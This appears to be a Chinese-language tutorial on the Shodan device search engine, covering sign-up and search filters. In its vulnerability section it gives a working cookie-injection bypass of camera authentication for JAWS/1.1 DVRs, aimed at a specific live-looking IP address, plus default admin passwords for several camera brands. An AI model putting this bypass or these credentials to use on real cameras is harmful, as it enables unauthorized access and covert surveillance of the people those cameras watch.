Shodan 搜索

一、簡介

與谷歌不同的是，Shodan不是在網上搜s索網址，而是直接進入互聯網的背后通道。Shodan可以說是一款“黑暗”谷歌，一刻不停的在尋找着所有和互聯網關聯的服務器、攝像頭、打印機、路由器等等。每個月Shodan都會在大約5億個服務器上日夜不停地搜集信息。

正確上網后訪問：Shodan 官網：https://www.shodan.io

二、注冊

使用 Shodan 最好是注冊一下，因為不注冊的話功能會受限制。需要注冊帳號，請打開返個鏈接注冊：https://account.shodan.io/register

三、Shodan 搜索技巧

1、搜索 Webcam 攝像頭設備

在搜索框中輸入“webcam”或“網絡攝像頭”進行搜索。也可以限制城市，比如輸入： city:beijing webcam

2、搜索 IP 地址

比如搜索：

net:101.222.129.35

3、搜索指定端口

在搜索框中輸入 port：端口號，就可以搜索指定端口。

我們可以嘗試一些常用端口來進行，搜索比如說我們搜索 80 端口

4、搜索具體城市

搜索欄中輸入 city:Beijing 就可以搜索出北京的聯網設備，我們可以和 port 迕行組合查詢輸入 city:beijing port:80 我們可以搜索到北京開放 80 端口的設備

5、搜索具體漏洞

比如：搜索攝像頭漏洞JAWS/1.1，若找到該漏洞的攝像頭，那么可以執行下列代碼，跳過認證。

document.cookie="dvr_camcnt=4";
document.cookie="dvr_usr=admin";
document.cookie="dvr_pwd=123";

找到具有漏洞的服務器，打開，然后在瀏覽器控制台輸入以上命令

瀏覽器中輸入view2.html重新加載頁面。

http://5.88.120.91:60001/view2.html

比如：常見攝像頭漏洞

海康威視的攝像頭（搜索：Hikvsion，用戶名：admin，密碼：12345）

大華攝像頭（用戶名：admin，密碼：888888）

天地偉業攝像頭（用戶名：Admin，密碼：111111）

四、參考

1、攝像頭

http://0day5.com/archives/3766/

2、google黑客資料庫

https://www.exploit-db.com/google-hacking-database/

3、Shodan 語法

http://www.freebuf.com/sectool/121339.html

4、域傳送漏洞

https://github.com/lijiejie/edu-dns-zone-transfer

5、收集子域名的思路

https://www.secpulse.com/archives/53182.html

6、web信息搜集

https://blog.csdn.net/qq_41741971/article/details/103174675?depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromBaidu-9&utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromBaidu-9

https://blog.csdn.net/fly_hps/article/details/80944542

https://www.fujieace.com/penetration-test/web-collect-message.html